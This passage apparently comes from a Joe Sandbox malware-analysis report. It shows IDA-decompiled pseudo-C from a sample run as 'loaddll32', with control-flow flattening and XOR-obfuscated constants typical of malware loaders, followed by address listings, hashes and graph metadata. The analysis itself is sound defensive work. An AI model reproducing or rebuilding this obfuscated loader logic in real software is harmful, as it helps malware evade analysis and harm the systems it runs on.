                                                                                                                                                                            										_t476 = E02F67C4E(_t440, _t459, _t441, _v1644, _v1752, _v1668, _v1636, _v1676, _v1756, _v1652, _t468, _v1684, _v1604, _v1624, _t441, _v1692, _t441, _v1732, _t441, _t468, _v1708,  &_v1560, _v1580, _v1612);
                                                                                                                                                                            										_t477 =  &(_t477[0x16]);
                                                                                                                                                                            										__eflags = _t476;
                                                                                                                                                                            										if(_t476 == 0) {
                                                                                                                                                                            											goto L10;
                                                                                                                                                                            										} else {
                                                                                                                                                                            											_t441 = 0x650cb13;
                                                                                                                                                                            											_v1576 = 1;
                                                                                                                                                                            											while(1) {
                                                                                                                                                                            												_t459 = 0x5c;
                                                                                                                                                                            												goto L3;
                                                                                                                                                                            											}
                                                                                                                                                                            										}
                                                                                                                                                                            									} else {
                                                                                                                                                                            										if(_t441 == 0x30ba806) {
                                                                                                                                                                            											_t469 =  *0x2f76214; // 0x0
                                                                                                                                                                            											_t470 = _t469 + 0x23c;
                                                                                                                                                                            											while(1) {
                                                                                                                                                                            												__eflags =  *_t470 - _t459;
                                                                                                                                                                            												if( *_t470 == _t459) {
                                                                                                                                                                            													break;
                                                                                                                                                                            												}
                                                                                                                                                                            												_t470 = _t470 + 2;
                                                                                                                                                                            												__eflags = _t470;
                                                                                                                                                                            											}
                                                                                                                                                                            											_t468 = _t470 + 2;
                                                                                                                                                                            											_t441 = 0xd1695f5;
                                                                                                                                                                            											continue;
                                                                                                                                                                            										} else {
                                                                                                                                                                            											if(_t441 == 0x650cb13) {
                                                                                                                                                                            												E02F6B257(_t440, _v1688, _v1740, _t476);
                                                                                                                                                                            												_t441 = 0x8b9ab05;
                                                                                                                                                                            												while(1) {
                                                                                                                                                                            													_t459 = 0x5c;
                                                                                                                                                                            													goto L3;
                                                                                                                                                                            												}
                                                                                                                                                                            											} else {
                                                                                                                                                                            												if(_t441 != 0x8b9ab05) {
                                                                                                                                                                            													goto L25;
                                                                                                                                                                            												} else {
                                                                                                                                                                            													_t352 =  &_v1748; // 0x45e6e926
                                                                                                                                                                            													E02F53046(_v1724,  *_t352, _v1716, _t476, _v1620);
                                                                                                                                                                            													_t477 =  &(_t477[3]);
                                                                                                                                                                            													L10:
                                                                                                                                                                            													_t441 = 0xc1f8872;
                                                                                                                                                                            													while(1) {
                                                                                                                                                                            														_t459 = 0x5c;
                                                                                                                                                                            														goto L3;
                                                                                                                                                                            													}
                                                                                                                                                                            												}
                                                                                                                                                                            											}
                                                                                                                                                                            										}
                                                                                                                                                                            									}
                                                                                                                                                                            								}
                                                                                                                                                                            								L28:
                                                                                                                                                                            								return _v1576;
                                                                                                                                                                            							}
                                                                                                                                                                            							__eflags = _t441 - 0xcb67425;
                                                                                                                                                                            							if(_t441 == 0xcb67425) {
                                                                                                                                                                            								E02F51A34(_v1592,  &_v520, _t441, _t441, _v1640, _v1648, _v1712, _t441, _v1600, _v1656);
                                                                                                                                                                            								_t477 =  &(_t477[8]);
                                                                                                                                                                            								_t441 = 0xd521465;
                                                                                                                                                                            								_t459 = 0x5c;
                                                                                                                                                                            								goto L25;
                                                                                                                                                                            							} else {
                                                                                                                                                                            								__eflags = _t441 - 0xd1695f5;
                                                                                                                                                                            								if(_t441 == 0xd1695f5) {
                                                                                                                                                                            									_t440 = E02F6E8B6(_t441, _v1608, _v1664, _t441, _v1720, _v1616);
                                                                                                                                                                            									_t477 =  &(_t477[4]);
                                                                                                                                                                            									__eflags = _t440;
                                                                                                                                                                            									if(_t440 != 0) {
                                                                                                                                                                            										_t441 = 0x1770085;
                                                                                                                                                                            										_t459 = 0x5c;
                                                                                                                                                                            										goto L3;
                                                                                                                                                                            									}
                                                                                                                                                                            								} else {
                                                                                                                                                                            									__eflags = _t441 - 0xd521465;
                                                                                                                                                                            									if(__eflags != 0) {
                                                                                                                                                                            										goto L25;
                                                                                                                                                                            									} else {
                                                                                                                                                                            										_push(_v1568);
                                                                                                                                                                            										_push(_v1660);
                                                                                                                                                                            										_push(_v1628);
                                                                                                                                                                            										_t429 = E02F6E1F8(0x2f51030, _v1700, __eflags);
                                                                                                                                                                            										E02F57078( &_v1040, __eflags);
                                                                                                                                                                            										_t432 =  *0x2f76214; // 0x0
                                                                                                                                                                            										_t436 =  *0x2f76214; // 0x0
                                                                                                                                                                            										E02F5F96F(_v1672, __eflags, _t436 + 0x34, _t429,  &_v1040, _v1588,  &_v1560, _t432 + 0x23c, _v1572, _v1596, _v1680,  &_v520);
                                                                                                                                                                            										E02F6FECB(_t429, _v1728, _v1564, _v1736, _v1744);
                                                                                                                                                                            										_t477 =  &(_t477[0x10]);
                                                                                                                                                                            										_t441 = 0x30ba806;
                                                                                                                                                                            										goto L1;
                                                                                                                                                                            									}
                                                                                                                                                                            								}
                                                                                                                                                                            							}
                                                                                                                                                                            							goto L28;
                                                                                                                                                                            							L25:
                                                                                                                                                                            							__eflags = _t441 - 0x3fe9fd3;
                                                                                                                                                                            						} while (_t441 != 0x3fe9fd3);
                                                                                                                                                                            						goto L28;
                                                                                                                                                                            					}
                                                                                                                                                                            				}
                                                                                                                                                                            			}






































































                                                                                                                                                                            0x02f5d14c
                                                                                                                                                                            0x02f5d156
                                                                                                                                                                            0x02f5d161
                                                                                                                                                                            0x02f5d166
                                                                                                                                                                            0x02f5d171
                                                                                                                                                                            0x02f5d17c
                                                                                                                                                                            0x02f5d184
                                                                                                                                                                            0x02f5d18c
                                                                                                                                                                            0x02f5d194
                                                                                                                                                                            0x02f5d19c
                                                                                                                                                                            0x02f5d1a7
                                                                                                                                                                            0x02f5d1af
                                                                                                                                                                            0x02f5d1ba
                                                                                                                                                                            0x02f5d1c2
                                                                                                                                                                            0x02f5d1ca
                                                                                                                                                                            0x02f5d1d2
                                                                                                                                                                            0x02f5d1da
                                                                                                                                                                            0x02f5d1e2
                                                                                                                                                                            0x02f5d1ea
                                                                                                                                                                            0x02f5d1f2
                                                                                                                                                                            0x02f5d1fa
                                                                                                                                                                            0x02f5d205
                                                                                                                                                                            0x02f5d210
                                                                                                                                                                            0x02f5d21b
                                                                                                                                                                            0x02f5d226
                                                                                                                                                                            0x02f5d231
                                                                                                                                                                            0x02f5d23c
                                                                                                                                                                            0x02f5d247
                                                                                                                                                                            0x02f5d252
                                                                                                                                                                            0x02f5d25d
                                                                                                                                                                            0x02f5d268
                                                                                                                                                                            0x02f5d270
                                                                                                                                                                            0x02f5d278
                                                                                                                                                                            0x02f5d280
                                                                                                                                                                            0x02f5d288
                                                                                                                                                                            0x02f5d290
                                                                                                                                                                            0x02f5d295
                                                                                                                                                                            0x02f5d29f
                                                                                                                                                                            0x02f5d2a7
                                                                                                                                                                            0x02f5d2ab
                                                                                                                                                                            0x02f5d2b3
                                                                                                                                                                            0x02f5d2bb
                                                                                                                                                                            0x02f5d2c3
                                                                                                                                                                            0x02f5d2cb
                                                                                                                                                                            0x02f5d2d3
                                                                                                                                                                            0x02f5d2db
                                                                                                                                                                            0x02f5d2e3
                                                                                                                                                                            0x02f5d2eb
                                                                                                                                                                            0x02f5d2f3
                                                                                                                                                                            0x02f5d2fe
                                                                                                                                                                            0x02f5d306
                                                                                                                                                                            0x02f5d311
                                                                                                                                                                            0x02f5d31c
                                                                                                                                                                            0x02f5d329
                                                                                                                                                                            0x02f5d32d
                                                                                                                                                                            0x02f5d332
                                                                                                                                                                            0x02f5d33a
                                                                                                                                                                            0x02f5d34d
                                                                                                                                                                            0x02f5d354
                                                                                                                                                                            0x02f5d35f
                                                                                                                                                                            0x02f5d36c
                                                                                                                                                                            0x02f5d370
                                                                                                                                                                            0x02f5d378
                                                                                                                                                                            0x02f5d380
                                                                                                                                                                            0x02f5d38b
                                                                                                                                                                            0x02f5d396
                                                                                                                                                                            0x02f5d3a1
                                                                                                                                                                            0x02f5d3ac
                                                                                                                                                                            0x02f5d3b4
                                                                                                                                                                            0x02f5d3bf
                                                                                                                                                                            0x02f5d3ca
                                                                                                                                                                            0x02f5d3d2
                                                                                                                                                                            0x02f5d3dd
                                                                                                                                                                            0x02f5d3e5
                                                                                                                                                                            0x02f5d3ed
                                                                                                                                                                            0x02f5d3f4
                                                                                                                                                                            0x02f5d3fc
                                                                                                                                                                            0x02f5d40b
                                                                                                                                                                            0x02f5d40c
                                                                                                                                                                            0x02f5d410
                                                                                                                                                                            0x02f5d415
                                                                                                                                                                            0x02f5d41d
                                                                                                                                                                            0x02f5d425
                                                                                                                                                                            0x02f5d430
                                                                                                                                                                            0x02f5d438
                                                                                                                                                                            0x02f5d443
                                                                                                                                                                            0x02f5d44b
                                                                                                                                                                            0x02f5d450
                                                                                                                                                                            0x02f5d45d
                                                                                                                                                                            0x02f5d461
                                                                                                                                                                            0x02f5d469
                                                                                                                                                                            0x02f5d471
                                                                                                                                                                            0x02f5d479
                                                                                                                                                                            0x02f5d481
                                                                                                                                                                            0x02f5d489
                                                                                                                                                                            0x02f5d491
                                                                                                                                                                            0x02f5d49c
                                                                                                                                                                            0x02f5d4a4
                                                                                                                                                                            0x02f5d4af
                                                                                                                                                                            0x02f5d4b7
                                                                                                                                                                            0x02f5d4bc
                                                                                                                                                                            0x02f5d4c1
                                                                                                                                                                            0x02f5d4c9
                                                                                                                                                                            0x02f5d4d4
                                                                                                                                                                            0x02f5d4df
                                                                                                                                                                            0x02f5d4ea
                                                                                                                                                                            0x02f5d4f5
                                                                                                                                                                            0x02f5d500
                                                                                                                                                                            0x02f5d508
                                                                                                                                                                            0x02f5d513
                                                                                                                                                                            0x02f5d51b
                                                                                                                                                                            0x02f5d523
                                                                                                                                                                            0x02f5d52b
                                                                                                                                                                            0x02f5d533
                                                                                                                                                                            0x02f5d53b
                                                                                                                                                                            0x02f5d54f
                                                                                                                                                                            0x02f5d556
                                                                                                                                                                            0x02f5d561
                                                                                                                                                                            0x02f5d56c
                                                                                                                                                                            0x02f5d579
                                                                                                                                                                            0x02f5d57d
                                                                                                                                                                            0x02f5d585
                                                                                                                                                                            0x02f5d58d
                                                                                                                                                                            0x02f5d595
                                                                                                                                                                            0x02f5d59a
                                                                                                                                                                            0x02f5d5a2
                                                                                                                                                                            0x02f5d5aa
                                                                                                                                                                            0x02f5d5b7
                                                                                                                                                                            0x02f5d5bb
                                                                                                                                                                            0x02f5d5c3
                                                                                                                                                                            0x02f5d5cb
                                                                                                                                                                            0x02f5d5d6
                                                                                                                                                                            0x02f5d5de
                                                                                                                                                                            0x02f5d5e9
                                                                                                                                                                            0x02f5d5f4
                                                                                                                                                                            0x02f5d5fc
                                                                                                                                                                            0x02f5d601
                                                                                                                                                                            0x02f5d609
                                                                                                                                                                            0x02f5d611
                                                                                                                                                                            0x02f5d619
                                                                                                                                                                            0x02f5d61e
                                                                                                                                                                            0x02f5d626
                                                                                                                                                                            0x02f5d62e
                                                                                                                                                                            0x02f5d636
                                                                                                                                                                            0x02f5d63e
                                                                                                                                                                            0x02f5d643
                                                                                                                                                                            0x02f5d648
                                                                                                                                                                            0x02f5d650
                                                                                                                                                                            0x02f5d65a
                                                                                                                                                                            0x02f5d665
                                                                                                                                                                            0x02f5d66d
                                                                                                                                                                            0x02f5d678
                                                                                                                                                                            0x02f5d686
                                                                                                                                                                            0x02f5d68b
                                                                                                                                                                            0x02f5d691
                                                                                                                                                                            0x02f5d699
                                                                                                                                                                            0x02f5d6a1
                                                                                                                                                                            0x02f5d6a9
                                                                                                                                                                            0x02f5d6ae
                                                                                                                                                                            0x02f5d6b6
                                                                                                                                                                            0x02f5d6be
                                                                                                                                                                            0x02f5d6c6
                                                                                                                                                                            0x02f5d6ce
                                                                                                                                                                            0x02f5d6d6
                                                                                                                                                                            0x02f5d6db
                                                                                                                                                                            0x02f5d6e3
                                                                                                                                                                            0x02f5d6eb
                                                                                                                                                                            0x02f5d6f3
                                                                                                                                                                            0x02f5d6fb
                                                                                                                                                                            0x02f5d707
                                                                                                                                                                            0x02f5d70a
                                                                                                                                                                            0x02f5d711
                                                                                                                                                                            0x02f5d715
                                                                                                                                                                            0x02f5d71d
                                                                                                                                                                            0x02f5d725
                                                                                                                                                                            0x02f5d72d
                                                                                                                                                                            0x02f5d735
                                                                                                                                                                            0x02f5d73d
                                                                                                                                                                            0x02f5d745
                                                                                                                                                                            0x02f5d750
                                                                                                                                                                            0x02f5d75b
                                                                                                                                                                            0x02f5d766
                                                                                                                                                                            0x02f5d773
                                                                                                                                                                            0x02f5d77a
                                                                                                                                                                            0x02f5d781
                                                                                                                                                                            0x02f5d785
                                                                                                                                                                            0x02f5d78a
                                                                                                                                                                            0x02f5d792
                                                                                                                                                                            0x02f5d79d
                                                                                                                                                                            0x02f5d7a8
                                                                                                                                                                            0x02f5d7b3
                                                                                                                                                                            0x02f5d7be
                                                                                                                                                                            0x02f5d7c6
                                                                                                                                                                            0x02f5d7ce
                                                                                                                                                                            0x02f5d7d6
                                                                                                                                                                            0x02f5d7de
                                                                                                                                                                            0x02f5d7e6
                                                                                                                                                                            0x02f5d7f1
                                                                                                                                                                            0x02f5d7fc
                                                                                                                                                                            0x02f5d807
                                                                                                                                                                            0x02f5d807
                                                                                                                                                                            0x02f5d80c
                                                                                                                                                                            0x02f5d80e
                                                                                                                                                                            0x02f5d80f
                                                                                                                                                                            0x02f5d80f
                                                                                                                                                                            0x02f5d80f
                                                                                                                                                                            0x02f5d80f
                                                                                                                                                                            0x02f5d811
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f5d817
                                                                                                                                                                            0x02f5da90
                                                                                                                                                                            0x02f5d81d
                                                                                                                                                                            0x02f5d823
                                                                                                                                                                            0x02f5d90c
                                                                                                                                                                            0x02f5d90e
                                                                                                                                                                            0x02f5d911
                                                                                                                                                                            0x02f5d913
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f5d919
                                                                                                                                                                            0x02f5d919
                                                                                                                                                                            0x02f5d91e
                                                                                                                                                                            0x02f5d80c
                                                                                                                                                                            0x02f5d80e
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f5d80e
                                                                                                                                                                            0x02f5d80c
                                                                                                                                                                            0x02f5d825
                                                                                                                                                                            0x02f5d82b
                                                                                                                                                                            0x02f5d87a
                                                                                                                                                                            0x02f5d880
                                                                                                                                                                            0x02f5d88b
                                                                                                                                                                            0x02f5d88b
                                                                                                                                                                            0x02f5d88e
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f5d888
                                                                                                                                                                            0x02f5d888
                                                                                                                                                                            0x02f5d888
                                                                                                                                                                            0x02f5d890
                                                                                                                                                                            0x02f5d893
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f5d82d
                                                                                                                                                                            0x02f5d833
                                                                                                                                                                            0x02f5d86c
                                                                                                                                                                            0x02f5d873
                                                                                                                                                                            0x02f5d80c
                                                                                                                                                                            0x02f5d80e
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f5d80e
                                                                                                                                                                            0x02f5d835
                                                                                                                                                                            0x02f5d83b
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f5d841
                                                                                                                                                                            0x02f5d84d
                                                                                                                                                                            0x02f5d855
                                                                                                                                                                            0x02f5d85a
                                                                                                                                                                            0x02f5d85d
                                                                                                                                                                            0x02f5d85d
                                                                                                                                                                            0x02f5d80c
                                                                                                                                                                            0x02f5d80e
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f5d80e
                                                                                                                                                                            0x02f5d80c
                                                                                                                                                                            0x02f5d83b
                                                                                                                                                                            0x02f5d833
                                                                                                                                                                            0x02f5d82b
                                                                                                                                                                            0x02f5d823
                                                                                                                                                                            0x02f5da98
                                                                                                                                                                            0x02f5daa9
                                                                                                                                                                            0x02f5daa9
                                                                                                                                                                            0x02f5d92e
                                                                                                                                                                            0x02f5d934
                                                                                                                                                                            0x02f5da5b
                                                                                                                                                                            0x02f5da60
                                                                                                                                                                            0x02f5da63
                                                                                                                                                                            0x02f5da6a
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f5d93a
                                                                                                                                                                            0x02f5d93a
                                                                                                                                                                            0x02f5d940
                                                                                                                                                                            0x02f5da1a
                                                                                                                                                                            0x02f5da1c
                                                                                                                                                                            0x02f5da1f
                                                                                                                                                                            0x02f5da21
                                                                                                                                                                            0x02f5da23
                                                                                                                                                                            0x02f5d80e
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f5d80e
                                                                                                                                                                            0x02f5d946
                                                                                                                                                                            0x02f5d946
                                                                                                                                                                            0x02f5d94c
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f5d952
                                                                                                                                                                            0x02f5d952
                                                                                                                                                                            0x02f5d95e
                                                                                                                                                                            0x02f5d962
                                                                                                                                                                            0x02f5d96d
                                                                                                                                                                            0x02f5d97b
                                                                                                                                                                            0x02f5d99f
                                                                                                                                                                            0x02f5d9c8
                                                                                                                                                                            0x02f5d9d2
                                                                                                                                                                            0x02f5d9ec
                                                                                                                                                                            0x02f5d9f1
                                                                                                                                                                            0x02f5d9f4
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f5d9f4
                                                                                                                                                                            0x02f5d94c
                                                                                                                                                                            0x02f5d940
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f5da6b
                                                                                                                                                                            0x02f5da6b
                                                                                                                                                                            0x02f5da6b
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f5da77
                                                                                                                                                                            0x02f5d80c

                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.315379294.0000000002F51000.00000020.00000001.sdmp, Offset: 02F50000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.315370225.0000000002F50000.00000004.00000001.sdmp Download File
                                                                                                                                                                            • Associated: 00000000.00000002.315401367.0000000002F76000.00000004.00000001.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2f50000_loaddll32.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: T)$&E$G<$Qob$URi$`QF$mm$n[1$o7$w5${;[
                                                                                                                                                                            • API String ID: 0-1763375246
                                                                                                                                                                            • Opcode ID: 3870249057e47dcf3001b04305d5e2838595ccce0c2b226f380bf8000eb83969
                                                                                                                                                                            • Instruction ID: a6b31043da536e5a4e8c03a2abd8381420e2fe99744741e9c9c47533a7365b48
                                                                                                                                                                            • Opcode Fuzzy Hash: 3870249057e47dcf3001b04305d5e2838595ccce0c2b226f380bf8000eb83969
                                                                                                                                                                            • Instruction Fuzzy Hash: DD2212714093809FD3B9CF61C94AA9BBBF1FBC1748F10890CE69A96260D7B58949CF53
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 835 2f65779-2f65da9 call 2f6fe29 838 2f65db1 835->838 839 2f65db8-2f65dbe 838->839 840 2f65f67-2f65f6d 839->840 841 2f65dc4 839->841 842 2f65f73-2f65f79 840->842 843 2f66041-2f66067 call 2f5fb8e 840->843 844 2f65f40-2f65f62 call 2f72b09 841->844 845 2f65dca-2f65dd0 841->845 848 2f66086-2f660a5 call 2f72b09 842->848 849 2f65f7f-2f65f85 842->849 868 2f66073 843->868 869 2f66069-2f6606e 843->869 844->839 850 2f65dd6-2f65ddc 845->850 851 2f65f03-2f65f30 call 2f557b8 845->851 870 2f660a6-2f660b7 848->870 858 2f65f87-2f65f8d 849->858 859 2f65ffc-2f6603c call 2f6cca0 849->859 852 2f65dde-2f65de4 850->852 853 2f65e3f-2f65eb2 call 2f55026 call 2f6c9b0 call 2f571b3 850->853 851->870 874 2f65f36-2f65f3b 851->874 863 2f65de6-2f65dec 852->863 864 2f65e35-2f65e3a 852->864 887 2f65ec7-2f65efe call 2f6cca0 853->887 888 2f65eb4-2f65ebd 853->888 861 2f65f93-2f65fec call 2f5e7de 858->861 862 2f66078-2f6607e 858->862 859->839 861->870 880 2f65ff2-2f65ff7 861->880 862->839 876 2f66084 862->876 863->862 872 2f65df2-2f65e1a call 2f5c5d8 863->872 864->839 868->862 869->839 883 2f65e2e-2f65e33 872->883 884 2f65e1c-2f65e2c 872->884 874->839 876->870 880->839 883->839 884->839 887->838 889 2f65ec2-2f65ec5 888->889 890 2f65ebf 888->890 889->887 889->888 890->889
                                                                                                                                                                            C-Code - Quality: 92%
                                                                                                                                                                            			E02F65779(intOrPtr* __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
                                                                                                                                                                            				char _v32;
                                                                                                                                                                            				void* _v44;
                                                                                                                                                                            				intOrPtr _v48;
                                                                                                                                                                            				intOrPtr _v60;
                                                                                                                                                                            				intOrPtr _v64;
                                                                                                                                                                            				intOrPtr _v68;
                                                                                                                                                                            				intOrPtr _v88;
                                                                                                                                                                            				char _v92;
                                                                                                                                                                            				char _v100;
                                                                                                                                                                            				intOrPtr _v104;
                                                                                                                                                                            				signed int _v108;
                                                                                                                                                                            				intOrPtr _v112;
                                                                                                                                                                            				char _v116;
                                                                                                                                                                            				signed int _v120;
                                                                                                                                                                            				signed int _v124;
                                                                                                                                                                            				signed int _v128;
                                                                                                                                                                            				signed int _v132;
                                                                                                                                                                            				signed int _v136;
                                                                                                                                                                            				signed int _v140;
                                                                                                                                                                            				signed int _v144;
                                                                                                                                                                            				signed int _v148;
                                                                                                                                                                            				signed int _v152;
                                                                                                                                                                            				signed int _v156;
                                                                                                                                                                            				unsigned int _v160;
                                                                                                                                                                            				signed int _v164;
                                                                                                                                                                            				signed int _v168;
                                                                                                                                                                            				signed int _v172;
                                                                                                                                                                            				unsigned int _v176;
                                                                                                                                                                            				signed int _v180;
                                                                                                                                                                            				signed int _v184;
                                                                                                                                                                            				unsigned int _v188;
                                                                                                                                                                            				signed int _v192;
                                                                                                                                                                            				signed int _v196;
                                                                                                                                                                            				signed int _v200;
                                                                                                                                                                            				signed int _v204;
                                                                                                                                                                            				signed int _v208;
                                                                                                                                                                            				unsigned int _v212;
                                                                                                                                                                            				signed int _v216;
                                                                                                                                                                            				signed int _v220;
                                                                                                                                                                            				signed int _v224;
                                                                                                                                                                            				signed int _v228;
                                                                                                                                                                            				signed int _v232;
                                                                                                                                                                            				signed int _v236;
                                                                                                                                                                            				signed int _v240;
                                                                                                                                                                            				signed int _v244;
                                                                                                                                                                            				signed int _v248;
                                                                                                                                                                            				unsigned int _v252;
                                                                                                                                                                            				signed int _v256;
                                                                                                                                                                            				signed int _v260;
                                                                                                                                                                            				signed int _v264;
                                                                                                                                                                            				signed int _v268;
                                                                                                                                                                            				signed int _v272;
                                                                                                                                                                            				signed int _v276;
                                                                                                                                                                            				signed int _v280;
                                                                                                                                                                            				signed int _v284;
                                                                                                                                                                            				signed int _v288;
                                                                                                                                                                            				void* _t410;
                                                                                                                                                                            				void* _t455;
                                                                                                                                                                            				void* _t464;
                                                                                                                                                                            				intOrPtr _t469;
                                                                                                                                                                            				void* _t475;
                                                                                                                                                                            				intOrPtr* _t477;
                                                                                                                                                                            				void* _t479;
                                                                                                                                                                            				signed int _t492;
                                                                                                                                                                            				signed char* _t519;
                                                                                                                                                                            				signed int _t522;
                                                                                                                                                                            				signed int _t523;
                                                                                                                                                                            				signed int _t524;
                                                                                                                                                                            				signed int _t525;
                                                                                                                                                                            				signed int _t526;
                                                                                                                                                                            				signed int _t527;
                                                                                                                                                                            				signed int _t528;
                                                                                                                                                                            				signed int _t529;
                                                                                                                                                                            				signed int _t530;
                                                                                                                                                                            				signed int _t531;
                                                                                                                                                                            				signed char* _t532;
                                                                                                                                                                            				intOrPtr _t533;
                                                                                                                                                                            				intOrPtr _t534;
                                                                                                                                                                            				void* _t535;
                                                                                                                                                                            				signed char* _t536;
                                                                                                                                                                            				intOrPtr* _t537;
                                                                                                                                                                            				signed int* _t539;
                                                                                                                                                                            				signed int* _t541;
                                                                                                                                                                            				void* _t543;
                                                                                                                                                                            
                                                                                                                                                                            				_t477 = _a12;
                                                                                                                                                                            				_push(_t477);
                                                                                                                                                                            				_push(_a8);
                                                                                                                                                                            				_t533 = __edx;
                                                                                                                                                                            				_t537 = __ecx;
                                                                                                                                                                            				_push(_a4);
                                                                                                                                                                            				_v104 = __edx;
                                                                                                                                                                            				_push(__edx);
                                                                                                                                                                            				_push(__ecx);
                                                                                                                                                                            				E02F6FE29(_t410);
                                                                                                                                                                            				_v48 = 0xc2c967;
                                                                                                                                                                            				_v108 = _v108 & 0x00000000;
                                                                                                                                                                            				asm("stosd");
                                                                                                                                                                            				_t539 =  &(( &_v288)[5]);
                                                                                                                                                                            				_t479 = 0x2d8a01e;
                                                                                                                                                                            				asm("stosd");
                                                                                                                                                                            				asm("stosd");
                                                                                                                                                                            				_v268 = 0x13192e;
                                                                                                                                                                            				_v268 = _v268 >> 0xe;
                                                                                                                                                                            				_t522 = 0x7a;
                                                                                                                                                                            				_v268 = _v268 / _t522;
                                                                                                                                                                            				_v268 = _v268 ^ 0xa67107cf;
                                                                                                                                                                            				_v268 = _v268 ^ 0xa67107cf;
                                                                                                                                                                            				_v180 = 0x822106;
                                                                                                                                                                            				_v180 = _v180 ^ 0x7b43f696;
                                                                                                                                                                            				_v180 = _v180 ^ 0xd3ff461a;
                                                                                                                                                                            				_v180 = _v180 ^ 0xa83e91ca;
                                                                                                                                                                            				_v260 = 0xfc96b3;
                                                                                                                                                                            				_v260 = _v260 ^ 0x88d779ee;
                                                                                                                                                                            				_v260 = _v260 | 0x0ca97313;
                                                                                                                                                                            				_v260 = _v260 ^ 0xca187f30;
                                                                                                                                                                            				_v260 = _v260 ^ 0x46b3802f;
                                                                                                                                                                            				_v288 = 0x4333cc;
                                                                                                                                                                            				_v288 = _v288 << 0xf;
                                                                                                                                                                            				_t523 = 0x34;
                                                                                                                                                                            				_v288 = _v288 / _t523;
                                                                                                                                                                            				_v288 = _v288 >> 3;
                                                                                                                                                                            				_v288 = _v288 ^ 0x005b8977;
                                                                                                                                                                            				_v136 = 0xc5dc93;
                                                                                                                                                                            				_v136 = _v136 * 0xc;
                                                                                                                                                                            				_v136 = _v136 ^ 0x0945f62e;
                                                                                                                                                                            				_v128 = 0x6b700a;
                                                                                                                                                                            				_t57 =  &_v128; // 0x6b700a
                                                                                                                                                                            				_v128 =  *_t57 * 0x15;
                                                                                                                                                                            				_v128 = _v128 ^ 0x08d49145;
                                                                                                                                                                            				_v232 = 0xf79846;
                                                                                                                                                                            				_v232 = _v232 ^ 0xca57ef9e;
                                                                                                                                                                            				_v232 = _v232 ^ 0x925d174a;
                                                                                                                                                                            				_v232 = _v232 ^ 0x58faffd4;
                                                                                                                                                                            				_v280 = 0xd1aac6;
                                                                                                                                                                            				_v280 = _v280 >> 0xc;
                                                                                                                                                                            				_v280 = _v280 >> 3;
                                                                                                                                                                            				_v280 = _v280 | 0xe15f3d77;
                                                                                                                                                                            				_v280 = _v280 ^ 0xe1581caf;
                                                                                                                                                                            				_v204 = 0x586478;
                                                                                                                                                                            				_v204 = _v204 << 6;
                                                                                                                                                                            				_v204 = _v204 * 0x45;
                                                                                                                                                                            				_v204 = _v204 ^ 0xf4c06de0;
                                                                                                                                                                            				_v236 = 0x7a6b49;
                                                                                                                                                                            				_v236 = _v236 + 0xfffff53d;
                                                                                                                                                                            				_v236 = _v236 + 0xffff6bfb;
                                                                                                                                                                            				_v236 = _v236 ^ 0x00796dc4;
                                                                                                                                                                            				_v164 = 0x73b924;
                                                                                                                                                                            				_v164 = _v164 * 0x37;
                                                                                                                                                                            				_v164 = _v164 ^ 0x18d89939;
                                                                                                                                                                            				_v140 = 0xd61f2b;
                                                                                                                                                                            				_v140 = _v140 | 0xe12df20d;
                                                                                                                                                                            				_v140 = _v140 ^ 0xe1fed234;
                                                                                                                                                                            				_v264 = 0xb74ee;
                                                                                                                                                                            				_v264 = _v264 | 0x369c0611;
                                                                                                                                                                            				_v264 = _v264 + 0xffffce97;
                                                                                                                                                                            				_v264 = _v264 | 0x56131c90;
                                                                                                                                                                            				_v264 = _v264 ^ 0x76993c7a;
                                                                                                                                                                            				_v188 = 0x86359d;
                                                                                                                                                                            				_v188 = _v188 | 0xee9d04be;
                                                                                                                                                                            				_v188 = _v188 >> 7;
                                                                                                                                                                            				_v188 = _v188 ^ 0x01d63d7e;
                                                                                                                                                                            				_v196 = 0x62a6bf;
                                                                                                                                                                            				_v196 = _v196 ^ 0x13f7b83b;
                                                                                                                                                                            				_v196 = _v196 | 0xfa5dbf29;
                                                                                                                                                                            				_v196 = _v196 ^ 0xfbd613bb;
                                                                                                                                                                            				_v272 = 0x497fb9;
                                                                                                                                                                            				_v272 = _v272 >> 8;
                                                                                                                                                                            				_v272 = _v272 + 0x46f;
                                                                                                                                                                            				_t524 = 0x15;
                                                                                                                                                                            				_v272 = _v272 / _t524;
                                                                                                                                                                            				_v272 = _v272 ^ 0x0006a64c;
                                                                                                                                                                            				_v284 = 0x22ff47;
                                                                                                                                                                            				_v284 = _v284 << 9;
                                                                                                                                                                            				_v284 = _v284 + 0x2a7e;
                                                                                                                                                                            				_v284 = _v284 | 0xa3b8d71b;
                                                                                                                                                                            				_v284 = _v284 ^ 0xe7f75fc1;
                                                                                                                                                                            				_v168 = 0x5effde;
                                                                                                                                                                            				_v168 = _v168 << 0xd;
                                                                                                                                                                            				_v168 = _v168 ^ 0xdff336ff;
                                                                                                                                                                            				_v160 = 0x143f18;
                                                                                                                                                                            				_v160 = _v160 >> 8;
                                                                                                                                                                            				_v160 = _v160 ^ 0x00026d5e;
